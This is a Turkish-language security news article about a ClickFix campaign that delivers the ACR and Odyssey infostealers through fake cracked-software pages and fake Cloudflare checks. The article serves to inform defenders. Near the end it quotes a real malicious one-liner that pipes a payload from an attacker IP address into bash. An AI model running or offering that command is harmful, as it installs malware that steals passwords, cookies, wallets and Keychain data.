Infostealer Kötü Amaçlı Yazılım Dağıtımı için Windows ve macOS Kullanıcılarını Hedefleyen Yeni ClickFix Saldırısı

   Kasım 14, 2025  Posted in CyberSecurityNews


Infostealer Kötü Amaçlı Yazılım Dağıtımı için Windows ve macOS Kullanıcılarını Hedefleyen Yeni ClickFix Saldırısı

ClickFix adı verilen ve giderek büyüyen bir sosyal mühendislik tekniği, son aylarda kötü amaçlı yazılım dağıtmanın en başarılı yöntemlerinden biri olarak ortaya çıktı.

Bu saldırı, kullanıcıları kandırarak komutları doğrudan işletim sistemlerinin komut satırı arayüzüne kopyalayıp çalıştırmalarını ve sonuçta tehlikeli bilgi çalma yazılımı yüklemelerini sağlar.

Tekniğin oldukça etkili olduğu kanıtlandı çünkü geleneksel e-posta güvenlik çözümlerini atlıyor ve çoğu güvenlik aracının kötü amaçlı etkinliği tespit edemediği tarayıcı sanal alanları içinde çalışıyor.

Saldırı genellikle kullanıcıların arama motorları aracılığıyla kırık yazılım aramasıyla başlar. Siber suçlular, güvenlik sistemleri tarafından engellenmemek için Google Colab, Drive, Sites ve Gruplar gibi güvenilir platformlarda barındırılan sahte açılış sayfaları oluşturur.

Bu sayfalar, mağdurları işletim sistemlerine göre yönlendiren ilk temas noktaları görevi görüyor. Windows kullanıcıları ACR hırsızlığını alırken, macOS kullanıcıları Odyssey bilgi hırsızlığını dağıtan sayfalara yönlendiriliyor.

Intel471 güvenlik araştırmacıları bu kampanyayı Haziran 2025’te proaktif kötü amaçlı yazılım avlama operasyonları sırasında tespit etti.

google

Araştırma, tehdit aktörlerinin tek bir altyapı üzerinden her iki büyük işletim sistemini de başarıyla hedeflediğini ortaya çıkardı.

Enfeksiyon zinciri (Kaynak - Intel471)
Enfeksiyon zinciri (Kaynak – Intel471)

Bu saldırıyı özellikle endişe verici kılan, dosyasız yürütülmesidir. Kurbanlar komutları yapıştırdığında, kötü amaçlı veriler doğrudan belleğe çekilerek geleneksel güvenlik yazılımlarına karşı görünmez hale geliyor.

Enfeksiyon Mekanizması ve Teknik Uygulama

Windows kullanıcıları için saldırı zinciri, kurbanlara, şifre korumalı ZIP arşivi içeren bir MEGA dosya barındırma sayfasına ulaşmadan önce çeşitli yeniden yönlendirme noktaları boyunca rehberlik eder.

Bu arşivin içinde setup.exe kılığına girmiş ACR hırsızı bulunur. Kötü amaçlı yazılım yalnızca kimlik bilgilerini ve kişisel verileri çalmakla kalmıyor, aynı zamanda bir yükleyici görevi de görüyor ve kripto para panosu korsanlığı yapan SharkClipper gibi ek tehditler yüklüyor.

Kullanıcılardan ClickFix komutunu çalıştırmalarını isteyen sahte Cloudflare güvenlik kontrolü (Kaynak - Intel471)
Kullanıcılardan ClickFix komutunu çalıştırmalarını isteyen sahte Cloudflare güvenlik kontrolü (Kaynak – Intel471)

MacOS kullanıcıları sahte Cloudflare güvenlik kontrol sayfasını içeren farklı bir yaklaşımla karşılaşıyor. Kullanıcılar doğrulama dizesi gibi görünen bir şeyi kopyalamaya çalıştıklarında aslında Base64 kodlu bir kabuk komutunu kopyalıyorlar.

Kodu çözüldükten sonra bu komut yürütülür: –

curl - s http://45.135.232.33/droberto39774 | nohup bash

Bu komut, parolaları, çerezleri, kripto para birimi cüzdanlarını, Apple Notes’u, Anahtarlık girişlerini ve sistem verilerini toplayan ve ardından dışarı sızmak için her şeyi out.zip dosyasına sıkıştıran Odyssey hırsızını sessizce indirir ve çalıştırır.

Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.

googlehaberler



Source link